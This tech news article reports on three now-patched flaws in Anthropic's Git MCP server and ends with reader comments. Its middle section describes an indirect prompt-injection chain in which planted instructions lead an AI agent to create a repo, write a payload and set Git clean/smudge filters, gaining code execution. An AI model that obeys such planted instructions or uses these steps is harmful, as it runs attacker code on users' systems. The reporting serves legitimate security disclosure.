Anthropic quietly fixed flaws in its Git MCP server that allowed for remote code execution
- Reference: 1768914014
- News link: https://www.theregister.co.uk/2026/01/20/anthropic_prompt_injection_flaws/
- Source link:
The Git MCP server, mcp-server-git, connects AI tools such as Copilot, Claude, and Cursor to Git repositories and the GitHub platform, allowing them to read repositories and code files, and automate workflows, all using natural language interactions.
Agentic AI security startup Cyata found a way to exploit the vulnerabilities - a path validation bypass flaw ( [1]CVE-2025-68145 ), an unrestricted git_init issue ( [2]CVE-2025-68143 ), and an argument injection in git_diff ( [3]CVE-2025-68144 ) - and chain the Git MCP server with the Filesystem MCP server to achieve code execution.
[4]
"Agentic systems break in unexpected ways when multiple components interact. Each MCP server might look safe in isolation, but combine two of them, Git and Filesystem in this case, and you get a toxic combination," Cyata security researcher Yarden Porat told The Register , adding that there's no indication that attackers exploited the bugs in the wild.
[5]
[6]
"As organizations adopt more complex agentic systems with multiple tools and integrations, these combinations will multiply," Porat said.
Cyata reported the three vulnerabilities to Anthropic in June, and the AI company fixed them in December. The flaws affect default deployments of mcp-server-git prior to 2025.12.18 - so make sure you're using the updated version.
[7]
The Register reached out to Anthropic for this story, but the company did not respond to our inquiries.
There's no S(ecurity) in MCP
In a Tuesday report shared with The Register ahead of publication, Cyata says the issues stem from the way AI systems connect to external data sources.
In 2024, [8]Anthropic introduced the Model Context Protocol (MCP), an open standard that enables LLMs to interact with these other systems - filesystems, databases, APIs, messaging platforms, and development tools like Git. MCP servers act as the bridge between the model and external sources, providing the AI with access to the data or tools they need.
As we've [9]seen [10]repeatedly over the [11]past year , LLMs can be [12]manipulated into [13]doing things they're [14]not supposed to do via [15]prompt injection , which happens when attacker-controlled input causes an AI system to follow unintended instructions. It's a problem that's not going away anytime soon - and [16]may never .
There are two types: indirect and direct. Direct prompt injection happens when someone directly submits malicious input, while indirect injection happens when content contains hidden commands that AI then follows as if the user had entered them.
[17]Contagious Claude Code bug Anthropic ignored promptly spreads to Cowork
[18]Anthropic Claude wants to be your helpful colleague, always looking over your shoulder
[19]Block CISO: We red-teamed our own AI agent to run an infostealer on an employee laptop
[20]Palo Alto Networks security-intel boss calls AI agents 2026's biggest insider threat
This attack abuses the three now-fixed vulnerabilities.
CVE-2025-68145: The --repository flag is supposed to restrict the MCP server to a specific repository path. However, the server didn't validate that repo_path arguments in subsequent tool calls within that configured path, thus allowing an attacker to bypass security boundaries and access any repository on the system.
[21]
CVE-2025-68143: The git_init tool accepted arbitrary filesystem paths and created Git repositories without any validation, allowing any directory to be turned into a Git repository and eligible for subsequent git operations through the MCP server. To fix this, Anthropic removed the git_init tool from the server.
CVE-2025-68144: The git_diff and git_checkout functions passed user-controlled arguments directly to the GitPython library without sanitization. "By injecting '--output=/path/to/file' into the 'target' field, an attacker could overwrite any file with an empty diff," and delete files, Cyata explained in the report.
Attack chain
As Porat explained to us, the attack uses indirect prompt injection: "Your IDE reads something malicious, a README file, a webpage, a GitHub issue, somewhere the attacker has planted instructions," he said.
The vulnerabilities, when combined with the Filesystem MCP server, abuse Git's smudge and clean filters, which execute shell commands defined in repository configuration files, and enable remote code execution.
According to Porat, it's a four-step process:
At a high level:
Create a Git repository in a writable directory using git_init.
Use the Filesystem MCP server to write a bash script - this is the payload that will execute.
Use the Filesystem MCP server to write to Git's internal config files (.git/config and .gitattributes), setting up "clean" and "smudge" filters. These are a Git feature that basically means: when certain Git operations happen, trigger this script.
The filters look like:
[filter "myfilter"]
clean = sh exploit.sh
smudge = sh exploit.sh
When the clean or smudge filter is triggered, the bash script runs - and the attacker has code execution.
This attack illustrates how, as more AI agents move into production, security has to keep pace.
"Security teams can't evaluate each MCP server in a vacuum," Porat said. "They need to assess the effective permissions of the entire agentic system, understand what tools can be chained together, and put controls in place. MCPs expand what agents can do, but they also expand the attack surface. Trust shouldn't be assumed, it needs to be verified and controlled." ®
Get our [22]Tech Resources
[1] https://github.com/advisories/GHSA-j22h-9j4x-23w5
[2] https://github.com/advisories/GHSA-5cgr-j3jf-jw3v
[3] https://github.com/advisories/GHSA-9xwc-hfwc-8w59
[4] https://pubads.g.doubleclick.net/gampad/jump?co=1&iu=/6978/reg_security/patches&sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&tile=2&c=2aW-0wRDWmm5mFOdf0fz8gQAAA4M&t=ct%3Dns%26unitnum%3D2%26raptor%3Dcondor%26pos%3Dtop%26test%3D0
[5] https://pubads.g.doubleclick.net/gampad/jump?co=1&iu=/6978/reg_security/patches&sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&tile=4&c=44aW-0wRDWmm5mFOdf0fz8gQAAA4M&t=ct%3Dns%26unitnum%3D4%26raptor%3Dfalcon%26pos%3Dmid%26test%3D0
[6] https://pubads.g.doubleclick.net/gampad/jump?co=1&iu=/6978/reg_security/patches&sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&tile=3&c=33aW-0wRDWmm5mFOdf0fz8gQAAA4M&t=ct%3Dns%26unitnum%3D3%26raptor%3Deagle%26pos%3Dmid%26test%3D0
[7] https://pubads.g.doubleclick.net/gampad/jump?co=1&iu=/6978/reg_security/patches&sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&tile=4&c=44aW-0wRDWmm5mFOdf0fz8gQAAA4M&t=ct%3Dns%26unitnum%3D4%26raptor%3Dfalcon%26pos%3Dmid%26test%3D0
[8] https://www.theregister.com/2025/04/21/mcp_guide/
[9] https://www.theregister.com/2025/08/20/amazon_quietly_fixed_q_developer_flaws/
[10] https://www.theregister.com/2025/09/26/salesforce_agentforce_forceleak_attack/
[11] https://www.theregister.com/2025/08/08/infosec_hounds_spot_prompt_injection/
[12] https://www.theregister.com/2026/01/12/block_ai_agent_goose/
[13] https://www.theregister.com/2026/01/08/openai_chatgpt_prompt_injection/
[14] https://www.theregister.com/2026/01/15/anthropics_claude_bug_cowork/
[15] https://www.theregister.com/2025/10/28/ai_browsers_prompt_injection/
[16] https://www.theregister.com/2025/10/22/openai_defends_atlas_as_prompt/
[17] https://www.theregister.com/2026/01/15/anthropics_claude_bug_cowork/
[18] https://www.theregister.com/2026/01/13/anthropic_previews_claude_cowork_for/
[19] https://www.theregister.com/2026/01/12/block_ai_agent_goose/
[20] https://www.theregister.com/2026/01/04/ai_agents_insider_threats_panw/
[21] https://pubads.g.doubleclick.net/gampad/jump?co=1&iu=/6978/reg_security/patches&sz=300x50%7C300x100%7C300x250%7C300x251%7C300x252%7C300x600%7C300x601&tile=3&c=33aW-0wRDWmm5mFOdf0fz8gQAAA4M&t=ct%3Dns%26unitnum%3D3%26raptor%3Deagle%26pos%3Dmid%26test%3D0
[22] https://whitepapers.theregister.com/
Don't worry, it will be called "Problem sideloading" and blessed as industry best practice.
"as more AI agents move into production, security has to keep pace."
I guess somebody will say: Add more AI.
Failing to sanitise user input - this is basic shit people. Have any of these AI bros heard of secure development or OWASP?
It's not possible to do
Not even in theory, because there is no distinction whatsoever between commands and data and cannot be.
An LLM simply cannot have an "execute bit".
All they are doing is adding guardrails to the output, and as everyone knows, guardrails can be vaulted over.
I don't even have to mention how this most likely didn't "fix" anything but just slightly moved the problem to the side, because the article already mentions it.